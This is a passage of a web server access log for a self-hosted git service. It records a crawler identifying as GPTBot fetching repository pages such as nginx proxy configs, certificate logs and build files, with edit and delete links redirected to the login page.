74.7.227.38] [Length 10303] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service?display=rendered" [Client 74.7.227.38] [Length 11127] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service" +[17/Feb/2026:16:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/projects.sln?display=source" [Client 74.7.227.38] [Length 11931] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/projects.sln" +[17/Feb/2026:16:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fProperties%2flaunchSettings.json" [Client 74.7.227.38] [Length 21724] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" +[17/Feb/2026:16:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 11079] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/types.ts" +[17/Feb/2026:16:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12994] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" +[17/Feb/2026:16:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 14072] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" +[17/Feb/2026:16:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12986] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" +[17/Feb/2026:16:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 13210] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" +[17/Feb/2026:16:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=name&state=closed" [Client 74.7.227.38] [Length 8494] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=mostcomplete&state=closed" +[17/Feb/2026:16:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" +[17/Feb/2026:16:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9986] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:16:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:16:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 11086] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:16:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:16:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 31527] [Gzip 6.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 1140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:30:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=name&state=open" [Client 74.7.227.38] [Length 8465] [Gzip 2.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=name&state=closed" +[17/Feb/2026:16:30:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 1445] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 39468] [Gzip 31.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:16:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 23048] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:16:30:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:16:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:16:30:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:16:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:16:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 9994] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:16:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:30:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 2430] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 1442] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:30:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 10072] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 9850] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 9850] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12773] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 15347] [Gzip 8.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 36058] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 36011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:16:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 9849] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 33675] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 33860] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 13064] [Gzip 7.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12752] [Gzip 7.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 23957] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 38986] [Gzip 6.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:30:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:30:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:30:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:16:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.6" 